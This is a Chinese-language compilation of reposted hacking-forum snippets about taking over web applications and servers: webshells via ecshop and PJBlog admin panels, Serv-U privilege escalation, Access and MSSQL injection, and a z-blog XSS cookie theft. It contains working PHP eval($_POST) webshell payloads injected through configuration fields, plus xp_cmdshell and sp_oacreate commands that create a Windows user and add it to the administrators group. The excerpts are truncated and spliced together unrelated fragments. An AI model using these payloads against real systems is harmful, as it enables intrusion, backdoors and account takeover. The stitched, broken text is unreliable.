作者：佚名    文章来源：网络转载

ecshop后台拿shell的方法，除了oldjun大牛的那个和上次说的那个，又发现两种。但是各有个的限制条件，听我一一道来。

其一：
ecshop后台有一个功能是sql查询，如图：

其实感觉在一个管理系统的后台放这么个功能根本没用，有多少网站管理员有这么高的觉悟，会用这个？
不过也不错，便宜了我们小菜拿shell。
方法就像phpmyadmin（下载地址：http://www.heibai.net/download/

serv-u提权使用前提:管理员没有设置本地管理密码.如果设置了,可以在serv-u安装目录\Users\Local Administrator Domain\.Archive里面找到一个MD5值,是前两位随机字符+MD5.破出来后减去前两位随机字符就是本地管理密码.如果管理员没有设置,在exp的第一页随便填什么密码都可以进去.建立好域的时候要等半分钟才能登陆.不然会出现错误.

<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,diz

PHP的一句话被替换为&lt;?php eval($_POST['c'])?&gt;

孤水绕城兄教的解决办法，如下

<strong> !','80VUL');EVAL($_POST[RING]);// </strong>

记录一下学习了，大家不知道的也看下吧

瞌睡龙整理 http://www.bhst.org/viewthread.php?tid=239&extra=page%3D1

网上找的几篇文章 自己整理了一下 希望对大家有用 更希望的是同志们自己看到好文章保存下来 慢慢总结   会有很大进步的。。。


1.收集信息。
   1-1． 不论什么途径获得的内网机器，确定他在内网后，我们首先就要了解这台机器的所属人员，如果我们的目标是公司，那我们就要了解这个人在公司里的职位，他是个什么身份，有

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了，也只是听说而已，具体的细节还是不得而知。
最近在看的书中一章提到Jet的安全，然后灵光一闪，呵呵，发现了一种可以利用access导出asp的方法，分享之。
几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件（可导出txt、htm、html等格式）的方法：
SELECT * into [test.txt] in ’d:\web\’ ’text;’ from admin
执行上述语句，在d:\web目录下就会生成test.txt文件，其内容就是表admin的内容。但是导出asp

感谢Netpatch的投递

有的时候，我们需要上传大东西，但是由于W2K3默认上传限制为200KB。这个时候，不得不分包，依次上传，那个累呀！
有人问为什么不用Microsoft.XMLHTTP和Adodb.Stream组件，直接从服务器上下载呢【要是不能访问网络呢？你会怎么做？】

于是有了这个超级上传程序。实践可以支持大于10M的文件!

暂时没测试出什么问题！若有问题,请留言！

转载请保留版权。谢谢合作!

SU.vbs    -----

今天在某某论坛发帖不按照版规[我一惯如此]..被人说偶是搞破坏
PJBlog3 v3.0.6.170

进到后台
点系统设置--界面--风格管理--编辑--切换到高级编辑

最下面新增一个变量

变量内容为 ’, ’#999’);eval($_POST[1]);// 替换内容随便写

这里的密码是数字

"1"
/forumdata/cache/style_1.php
实现方法 S.N.T安全小组有一篇详细的文章

也不是什么高级利用 - - 就找到一个XSS，然后附加一条语句在加一个ASP文件获取COOKIES
挺被动的攻击，若是嵌入到页面中的XSS效率可能会提高一点
--------------------------------------------------------------------------------------------------------------
作者:van

Blog:www.ghostvan.cn

测试环境 Vmware , z-blog1.8

影响版本 通杀

被动式攻击 zblog XSS 最新可用.

为了原创,出血了,看了一下,都几个月了,还没补,官方也有此洞.

1、连接数据库

driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名

2、添加新用户

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'

3、把用户加到管理组

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add

原文来自老邪的博客

前几天刺在我们的maillist发了一个老外写的文章，大意是可以用php来实现数据的劫持和转发。我瞄了一下，确实可行，于是今天抽出了以前用来扯淡的时间，写了段代码验证了一下想法。老外的原文是一个PDF，有兴趣看的可以看看。地址是在：http://www.secforce.co.uk/media/presentations/OWASP_Abusing_PHP_sockets.pdf。其实关于这个的原理，我记得很早很早之前flashsky就在xfocus上面贴过通过SO_REUSEADDR

貌似是LINK的文章哦 被网安基地转载都没注明的 我日 支持LINK干掉他们

转载注明LINK出处
===============================================================

对于session欺骗 大家都蒙了。
百度上有一篇文章 骗了整个网络界 虽然有不少人已经发现是错误的理论 误导的文章 。使不少人觉得 session欺骗很牛x 其实不然
那篇文章叫eWebEditor session欺骗漏洞
没错 ew的确存在那漏洞 但是那个作者说错了

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：  

exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"’  
建立虚拟目录win,指向c:\windows\system32  
exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecu

没学过MYSQL 今天看了个教程 一条注入语句中带了Caoncat这个函数 顺手找了这篇文章学习一下
===========================================================================

SQL注入语句有时候会使用替换查询技术，就是让原有的查询语句查不到结果出错，而让自己构造的查询语句执行，并把执行结果代替原有查询语句查询结果显示出来。

     例如：原本查询语句是 select username,email,content from test_table where user_id=uid;其中uid,是用户输入的。正常显示结果会出现用户名，